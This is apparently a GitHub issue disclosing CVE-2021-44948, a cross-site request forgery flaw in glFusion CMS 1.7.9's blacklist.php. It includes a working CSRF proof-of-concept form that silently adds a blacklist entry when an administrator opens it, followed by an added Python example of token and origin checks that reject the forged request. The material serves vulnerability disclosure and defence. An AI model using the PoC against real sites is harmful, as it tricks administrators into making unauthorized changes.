
CVE-2021-44948: glFusion CMS 1.7.9 blacklist.php CSRF vulnerability · Issue #486 · glFusion/glfusion

glFusion CMS 1.7.9 is affected by a Cross-Site Request Forgery (CSRF) vulnerability in /public_html/admin/plugins/bad_behavior2/blacklist.php. By tricking the administrator into clicking, an attacker can use the CSRF vulnerability to add a blacklist entry.


Attackers can construct blacklist IP addresses. By using the CSRF vulnerability to trick the administrator into clicking, they can add a blacklist.

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://192.168.255.130/glfusion-1.7.9/public_html/admin/plugins/bad_behavior2/blacklist.php" method="POST">
      <input type="hidden" name="mode" value="addsave" />
      <input type="hidden" name="bl&#95;type" value="spambot&#95;ip" />
      <input type="hidden" name="bl&#95;item" value="1&#46;1&#46;1&#46;121" />
      <input type="hidden" name="ban&#95;reason" value="ipbrute" />
      <input type="hidden" name="submit" value="Submit" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
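
The form above carries only the blacklist fields and no anti-CSRF token, so the only thing authenticating the request is the administrator's session. The following Python model of a handler for the same fields is an added example, not glFusion code and not part of the issue; the `csrf_token` field, `TRUSTED_ORIGIN`, the function names and the sample requests are assumptions made for illustration.

```python
import hashlib
import hmac
import secrets
from urllib.parse import urlsplit

SERVER_KEY = secrets.token_bytes(32)      # per-deployment secret (constructed)
TRUSTED_ORIGIN = "https://cms.example"    # assumed origin of the admin site

def issue_token(session_id):
    """Session-bound token the server embeds as a hidden field in its own form."""
    return hmac.new(SERVER_KEY, session_id.encode(), hashlib.sha256).hexdigest()

def same_origin(headers):
    """True only if Origin (or Referer as fallback) matches the site's origin."""
    source = headers.get("Origin") or headers.get("Referer")
    if not source:
        return False                      # strict: no provenance header, no write
    parts = urlsplit(source)
    return f"{parts.scheme}://{parts.netloc}" == TRUSTED_ORIGIN

def handle_blacklist_post(session_id, headers, form):
    """Return (status, message) for a POST carrying the blacklist form fields."""
    if form.get("mode") != "addsave":
        return 400, "unsupported mode"
    if not same_origin(headers):
        return 403, "cross-origin request rejected"
    supplied = form.get("csrf_token", "").encode()
    if not hmac.compare_digest(supplied, issue_token(session_id).encode()):
        return 403, "missing or invalid CSRF token"
    return 200, f"added {form.get('bl_type')} {form.get('bl_item')}"

# Constructed sample requests. The forged one has the fields of the form above
# and arrives with the admin's session, but from another origin and tokenless.
SESSION = "admin-session-1"
FORGED = {"mode": "addsave", "bl_type": "spambot_ip", "bl_item": "1.1.1.121",
          "ban_reason": "ipbrute", "submit": "Submit"}
LEGIT = dict(FORGED, csrf_token=issue_token(SESSION))

if __name__ == "__main__":
    print(handle_blacklist_post(SESSION, {"Origin": "https://other.example"}, FORGED))
    print(handle_blacklist_post(SESSION, {"Origin": TRUSTED_ORIGIN}, FORGED))
    print(handle_blacklist_post(SESSION, {"Origin": TRUSTED_ORIGIN}, LEGIT))
```

The second call shows why the token matters even when the origin check passes: a request with the right headers but no token is still refused.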
